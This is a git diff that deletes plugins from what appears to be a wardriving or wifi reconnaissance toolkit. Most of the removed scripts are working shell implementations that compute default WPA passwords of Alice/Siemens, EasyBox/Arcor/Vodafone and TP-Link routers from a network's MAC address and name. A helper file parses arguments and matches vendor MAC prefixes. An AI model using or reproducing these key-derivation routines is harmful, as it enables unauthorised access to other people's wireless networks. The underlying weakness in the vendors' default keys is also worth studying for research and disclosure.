Diffstat (limited to 'recon/inspect_wifi/plugins')
-rwxr-xr-x | recon/inspect_wifi/plugins/01open | 6 | ||||
-rwxr-xr-x | recon/inspect_wifi/plugins/02alice | 23 | ||||
-rwxr-xr-x | recon/inspect_wifi/plugins/02easybox | 36 | ||||
-rwxr-xr-x | recon/inspect_wifi/plugins/02tplink | 24 | ||||
-rw-r--r-- | recon/inspect_wifi/plugins/plugin_core | 41 |
5 files changed, 0 insertions, 130 deletions
diff --git a/recon/inspect_wifi/plugins/01open b/recon/inspect_wifi/plugins/01open
deleted file mode 100755
index 881f47ea..00000000
--- a/recon/inspect_wifi/plugins/01open
+++ /dev/null
@@ -1,6 +0,0 @@
-#!/bin/sh
-#ESSID MAC CHANNEL ENCRYPTION
-if [ "$4" == "[ESS]" ]; then
- exit 0
-fi
-exit 1
diff --git a/recon/inspect_wifi/plugins/02alice b/recon/inspect_wifi/plugins/02alice
deleted file mode 100755
index f30acc3a..00000000
--- a/recon/inspect_wifi/plugins/02alice
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/bin/sh
-# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
-# Based on Poc from
-# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
-#
-#
-# ESSID MAC CHANNEL ENCRYPTION
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-
-parse_plugin_args "$@"
-
-if ! check_vendor_mac $VENDOR_MAC "00255E" ;then
- echo "$VENDOR_MAC not affected"
- exit 1
-fi
-
-# printf always makes string to lower, need that for correct md5sum
-ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
-TMP=$(printf $ETHMAC | md5sum)
-printf ${TMP:0:12} | base64
-exit 0
diff --git a/recon/inspect_wifi/plugins/02easybox b/recon/inspect_wifi/plugins/02easybox
deleted file mode 100755
index 58816f25..00000000
--- a/recon/inspect_wifi/plugins/02easybox
+++ /dev/null
@@ -1,36 +0,0 @@
-#!/bin/sh
-#ESSID MAC CHANNEL ENCRYPTION WPA WPA2
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-parse_plugin_args "$@"
-
-if ! echo "$ESSID" | grep -q '\(EasyBox-\|Arcor-\|Vodafone-\)'; then
- echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone"
- exit 1
-else
- # Fill up to 4 places with zeros, if necessary:
- deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g')
- #
- # The digits M9 to M12 are just the last digits (9.-12.) of the MAC:
- hexi=$(echo ${MAC:8:4} | sed 's/./& /g')
- #echo 'M4 (Hex): ' ${hexi[@]}
- # K1 = last byte of (d0 + d1 + h2 + h3)
- # K2 = last byte of (h0 + h1 + d2 + d3)
- c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1})
- c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1})
- K1=$((($c1)%16))
- K2=$((($c2)%16))
- #printf "K1: %x\n" $K1
- #printf "K2: %x\n" $K2
- X1=$((K1^${deci:6:1}))
- X2=$((K1^${deci:4:1}))
- X3=$((K1^${deci:2:1}))
- Y1=$((K2^0x${hexi:2:1}))
- Y2=$((K2^0x${hexi:4:1}))
- Y3=$((K2^0x${hexi:6:1}))
- Z1=$((0x${hexi:4:1}^${deci:6:1}))
- Z2=$((0x${hexi:6:1}^${deci:4:1}))
- Z3=$((K1^K2))
- printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F
-fi
diff --git a/recon/inspect_wifi/plugins/02tplink b/recon/inspect_wifi/plugins/02tplink
deleted file mode 100755
index 522c0845..00000000
--- a/recon/inspect_wifi/plugins/02tplink
+++ /dev/null
@@ -1,24 +0,0 @@
-#!/bin/sh
-# Implementation of TP-Link default WPA Key
-# Based on
-# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-
-parse_plugin_args "$@"
-
-if ! check_vendor_mac $VENDOR_MAC F8D111; then
- echo "$VENDOR_MAC not affected"
- exit 1
-fi
-
-if echo "$ESSID" | grep -q '^tp'; then
- echo "$ESSID not affected"
- exit 1
-fi
-
-
-# printf always makes string to lower, need that for correct md5sum
-printf "${MAC:4:12}"
-exit 0
diff --git a/recon/inspect_wifi/plugins/plugin_core b/recon/inspect_wifi/plugins/plugin_core
deleted file mode 100644
index e79a3c05..00000000
--- a/recon/inspect_wifi/plugins/plugin_core
+++ /dev/null
@@ -1,41 +0,0 @@
-#!/bin/sh
-parse_plugin_args(){
- [ $# -ne 4 ] && plugin_usage && exit 1
- # convenience function to put args in ENV variables
- ESSID="$1"
-
- # mac is returned without colon
- MAC=$(printf "%s" "$2" | sed 's/://g')
- # split up the mac address to vendor and private part
- VENDOR_MAC=${MAC:0:6}
- PRIVATE_MAC=${MAC:6:12}
- CHANNEL="$3"
- ENC="$4"
- if [ ${#MAC} -ne 12 ] ;then
- echo "MAC malformed"
- exit 1
- fi
-}
-plugin_usage(){
- cat << EOF
-usage: $0 ESSID MAC CHANNEL ENC"
-
- ESSID - string
- MAC - 00:11:22:33:44:55
- CHANNEL - 4
- ENC - wpa
-EOF
-
-}
-
-check_vendor_mac(){
- needle="$(printf $1 | tr '[A-Z]' '[a-z]')"
- shift
- for i in "$@";do
- [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0
- done
- return 1
-}
-check_painmode(){
- test -z "${painmode:-}" && echo "painmode required" && exit 1
-} |